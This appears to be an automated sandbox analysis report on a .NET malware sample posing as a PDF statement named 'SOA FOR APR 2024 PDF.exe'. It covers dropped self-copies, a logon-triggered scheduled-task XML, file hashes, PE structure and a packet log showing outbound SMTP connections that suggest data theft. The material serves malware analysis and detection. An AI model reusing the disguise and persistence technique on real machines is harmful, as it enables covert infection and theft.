                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njl2nzqb.hxd.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxgopani.ari.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1580
                                Entropy (8bit):5.102838589420805
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                MD5:86AAC1A561EE5A392DE50B16A2CBB61A
                                SHA1:895CF6E52F0E56941AB14E1287E8173F1DB7CF52
                                SHA-256:E1C802092F0FDE389CFC62DC3D054ADAF017A66B37D392FED9A1A8284AC369D3
                                SHA-512:6A8F4C47A0D1AF7049D5CEC1E12E28D385C91398392591B57FB0D6A30FB78DC58F150369118F917A5EFEEE22507D2168521DA68A23EFBA65B52618195E2FB24E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                C:\Users\user\AppData\Local\Temp\tmp9B5.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1580
                                Entropy (8bit):5.102838589420805
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                MD5:86AAC1A561EE5A392DE50B16A2CBB61A
                                SHA1:895CF6E52F0E56941AB14E1287E8173F1DB7CF52
                                SHA-256:E1C802092F0FDE389CFC62DC3D054ADAF017A66B37D392FED9A1A8284AC369D3
                                SHA-512:6A8F4C47A0D1AF7049D5CEC1E12E28D385C91398392591B57FB0D6A30FB78DC58F150369118F917A5EFEEE22507D2168521DA68A23EFBA65B52618195E2FB24E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                C:\Users\user\AppData\Local\Temp\tmpCB26.tmp

                                Download File
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1580
                                Entropy (8bit):5.102838589420805
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                MD5:86AAC1A561EE5A392DE50B16A2CBB61A
                                SHA1:895CF6E52F0E56941AB14E1287E8173F1DB7CF52
                                SHA-256:E1C802092F0FDE389CFC62DC3D054ADAF017A66B37D392FED9A1A8284AC369D3
                                SHA-512:6A8F4C47A0D1AF7049D5CEC1E12E28D385C91398392591B57FB0D6A30FB78DC58F150369118F917A5EFEEE22507D2168521DA68A23EFBA65B52618195E2FB24E
                                Malicious:true
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1580
                                Entropy (8bit):5.102838589420805
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                MD5:86AAC1A561EE5A392DE50B16A2CBB61A
                                SHA1:895CF6E52F0E56941AB14E1287E8173F1DB7CF52
                                SHA-256:E1C802092F0FDE389CFC62DC3D054ADAF017A66B37D392FED9A1A8284AC369D3
                                SHA-512:6A8F4C47A0D1AF7049D5CEC1E12E28D385C91398392591B57FB0D6A30FB78DC58F150369118F917A5EFEEE22507D2168521DA68A23EFBA65B52618195E2FB24E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

                                Download File
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):722944
                                Entropy (8bit):7.94272561913419
                                Encrypted:false
                                SSDEEP:12288:mWYIPXjxannnHg2rA1a8vHKzUREMEngfnRhU0KjqdAwz725zfjVfjKIsj+1F0DxY:mWYIPFannnHg2Qa86n0LdAA70ztjRh0W
                                MD5:7A6E9D01D9162C7537BA8091187E4235
                                SHA1:F5B69F4B0EC8CD0A4B7BAB26A0DE167C8CC535CD
                                SHA-256:7FD14673F73717B024728AE4248BE0A1579F480A261C4F4D94742F230A01CB47
                                SHA-512:7AF388861A5BE63B87E8159E2B20BF78D110517B8DB6A314A7128CBA29075734BE43C543B1D701E360778D539951C58E3C06BC2EE2E2AD6855D0067FFF55A199
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 45%
                                • Antivirus: Virustotal, Detection: 52%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)f..............0...... ........... ........@.. .......................@............`.....................................O............................ ....................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier

                                Download File
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Preview:[ZoneTransfer]....ZoneId=0

                                C:\Users\user\AppData\Roaming\eeBIYZL.exe

                                Download File
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):722944
                                Entropy (8bit):7.94272561913419
                                Encrypted:false
                                SSDEEP:12288:mWYIPXjxannnHg2rA1a8vHKzUREMEngfnRhU0KjqdAwz725zfjVfjKIsj+1F0DxY:mWYIPFannnHg2Qa86n0LdAA70ztjRh0W
                                MD5:7A6E9D01D9162C7537BA8091187E4235
                                SHA1:F5B69F4B0EC8CD0A4B7BAB26A0DE167C8CC535CD
                                SHA-256:7FD14673F73717B024728AE4248BE0A1579F480A261C4F4D94742F230A01CB47
                                SHA-512:7AF388861A5BE63B87E8159E2B20BF78D110517B8DB6A314A7128CBA29075734BE43C543B1D701E360778D539951C58E3C06BC2EE2E2AD6855D0067FFF55A199
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 45%
                                • Antivirus: Virustotal, Detection: 52%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)f..............0...... ........... ........@.. .......................@............`.....................................O............................ ....................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Roaming\eeBIYZL.exe:Zone.Identifier

                                Download File
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:false
                                Preview:[ZoneTransfer]....ZoneId=0

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.94272561913419
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                File name:SOA FOR APR 2024 PDF.exe
                                File size:722'944 bytes
                                MD5:7a6e9d01d9162c7537ba8091187e4235
                                SHA1:f5b69f4b0ec8cd0a4b7bab26a0de167c8cc535cd
                                SHA256:7fd14673f73717b024728ae4248be0a1579f480a261c4f4d94742f230a01cb47
                                SHA512:7af388861a5be63b87e8159e2b20bf78d110517b8db6a314a7128cba29075734be43c543b1d701e360778d539951c58e3c06bc2ee2e2ad6855d0067fff55a199
                                SSDEEP:12288:mWYIPXjxannnHg2rA1a8vHKzUREMEngfnRhU0KjqdAwz725zfjVfjKIsj+1F0DxY:mWYIPFannnHg2Qa86n0LdAA70ztjRh0W
                                TLSH:13F4238561FDCB8BF83F5BB44070192493F5BD696860E3189FC111EC9B23785A261BAB
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)f..............0...... ........... ........@.. .......................@............`................................

                                File Icon

                                Icon Hash:c14e4c4c4c4c4f41

                                Static PE Info

                                General

                                Entrypoint:0x4afcfa
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6629B98C [Thu Apr 25 02:01:48 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                xor eax, 35455354h
                                xor dword ptr [edi+eax*2], esi
                                dec eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ebx+4Ah], dl
                                push ebx
                                cmp byte ptr [eax+edi+34h], al
                                inc ebx
                                inc ebx
                                xor al, 37h
                                xor eax, 00000035h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xafca80x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x1008.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000xadd200xae000d1844d91aa8a9d976e370c8f9467037aFalse0.9530043327945402data7.967897552415294IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0xb00000x10080x180097cd8a03d00455574c2f9938c520bf3eFalse0.5411783854166666data5.083108720564573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0xb20000xc0x8003b9e26e8b113c26ab4ad596d024629afFalse0.01611328125data0.03037337037012526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0xb00c80xc08PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9308441558441558
                                RT_GROUP_ICON0xb0ce00x14data1.05
                                RT_VERSION0xb0d040x300MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"0.4427083333333333

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Apr 26, 2024 09:01:58.020010948 CEST49708443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:01:58.020036936 CEST44349708104.26.12.205192.168.2.5
                                Apr 26, 2024 09:01:58.020129919 CEST49708443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:01:58.025794029 CEST49708443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:01:58.025810957 CEST44349708104.26.12.205192.168.2.5
                                Apr 26, 2024 09:01:58.320241928 CEST44349708104.26.12.205192.168.2.5
                                Apr 26, 2024 09:01:58.320322990 CEST49708443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:01:58.322689056 CEST49708443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:01:58.322695017 CEST44349708104.26.12.205192.168.2.5
                                Apr 26, 2024 09:01:58.323110104 CEST44349708104.26.12.205192.168.2.5
                                Apr 26, 2024 09:01:58.377305984 CEST49708443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:01:58.450061083 CEST49708443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:01:58.492161036 CEST44349708104.26.12.205192.168.2.5
                                Apr 26, 2024 09:01:58.643203020 CEST44349708104.26.12.205192.168.2.5
                                Apr 26, 2024 09:01:58.643276930 CEST44349708104.26.12.205192.168.2.5
                                Apr 26, 2024 09:01:58.643325090 CEST49708443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:01:58.649333954 CEST49708443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:01:59.688827991 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:01:59.887290955 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:01:59.887370110 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:00.184763908 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:00.186783075 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:00.383451939 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:00.383615017 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:00.581645012 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:00.582048893 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:00.788806915 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:00.789010048 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:00.789024115 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:00.789057016 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:00.826528072 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:01.028373957 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:01.032215118 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:01.229387999 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:01.230385065 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:01.427436113 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:01.428416967 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:01.664973974 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:01.726907015 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:01.727221012 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:01.923645020 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:01.923724890 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:01.923963070 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:02.162568092 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:02.177920103 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:02.178169012 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:02.374411106 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:02.374490023 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:02.375130892 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:02.375185013 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:02.375211000 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:02.375226974 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:02.571576118 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:02.571796894 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:02.572338104 CEST5874971150.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:02.627312899 CEST49711587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:03.358038902 CEST49712443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:02:03.358089924 CEST44349712104.26.12.205192.168.2.5
                                Apr 26, 2024 09:02:03.358233929 CEST49712443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:02:03.361484051 CEST49712443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:02:03.361515999 CEST44349712104.26.12.205192.168.2.5
                                Apr 26, 2024 09:02:03.647284031 CEST44349712104.26.12.205192.168.2.5
                                Apr 26, 2024 09:02:03.647380114 CEST49712443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:02:03.649467945 CEST49712443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:02:03.649488926 CEST44349712104.26.12.205192.168.2.5
                                Apr 26, 2024 09:02:03.650463104 CEST44349712104.26.12.205192.168.2.5
                                Apr 26, 2024 09:02:03.690325022 CEST49712443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:02:03.710253954 CEST49712443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:02:03.756124020 CEST44349712104.26.12.205192.168.2.5
                                Apr 26, 2024 09:02:03.972718000 CEST44349712104.26.12.205192.168.2.5
                                Apr 26, 2024 09:02:03.972873926 CEST44349712104.26.12.205192.168.2.5
                                Apr 26, 2024 09:02:03.972964048 CEST49712443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:02:03.976149082 CEST49712443192.168.2.5104.26.12.205
                                Apr 26, 2024 09:02:04.530052900 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:04.727452993 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:04.727585077 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:04.995862961 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:04.996057987 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:05.192907095 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:05.193202019 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:05.394184113 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:05.394665003 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:05.602966070 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:05.602981091 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:05.602993011 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:05.603214979 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:05.604878902 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:05.801742077 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:05.805373907 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:06.015054941 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:06.015356064 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:06.215074062 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:06.215420961 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:06.414022923 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:06.414283037 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:06.610853910 CEST5874971350.87.195.61192.168.2.5
                                Apr 26, 2024 09:02:06.611076117 CEST49713587192.168.2.550.87.195.61
                                Apr 26, 2024 09:02:06.849312067 CEST5874971350.87.195.61192.168.2.5
